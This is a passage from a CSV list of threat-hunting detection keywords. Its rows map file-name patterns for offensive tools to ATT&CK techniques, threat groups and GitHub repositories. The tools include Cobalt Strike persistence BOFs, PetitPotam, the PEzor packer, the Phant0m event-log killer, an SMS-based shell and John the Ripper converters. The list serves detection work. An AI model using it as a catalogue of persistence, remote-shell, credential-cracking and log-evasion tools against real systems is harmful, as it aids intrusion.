T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Persistence_WinlogonHelperDLL_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PersistenceBOF.c*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*PersistenceBOF.exe*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persistent-security/SMShell*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" +"*persist-ice-junction.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-monitor.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-shortcut.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-time.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-xll.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*PersStartup.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*PEScrambler.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*PetitPotam.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*PetitPotam.cpp*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - 
T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*PetitPotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.ps1*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*petitpotam.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*petitpotam.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*PetitPotam.py*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.sln*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*PetitPotam.sln*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.vcxproj*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*petitpotam_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 
- TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*PetitPotamModified.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*PEzor generated Beacon Object File*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*PEzor*/Inject.c*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*Pezor*inject.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*PEzor.sh -*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*PEzor.sh *.bin*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*PEzor/*/bof.cpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*PEzor/*syscalls.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*pfsense*reverse_root_shell_csrf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*pfx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgfpignfckbloagkfnamnolkeaecfgfh*","greyware_tool_keyword","Free Proxy VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*pgpdisk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgpsda2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgpwde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Phant0m scm 1*","offensive_tool_keyword","Phant0m","Windows Event Log 
Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*Phant0m scm 2*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*Phant0m wmi*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*phant0m.cna*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*Phant0m_cobaltstrike*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - 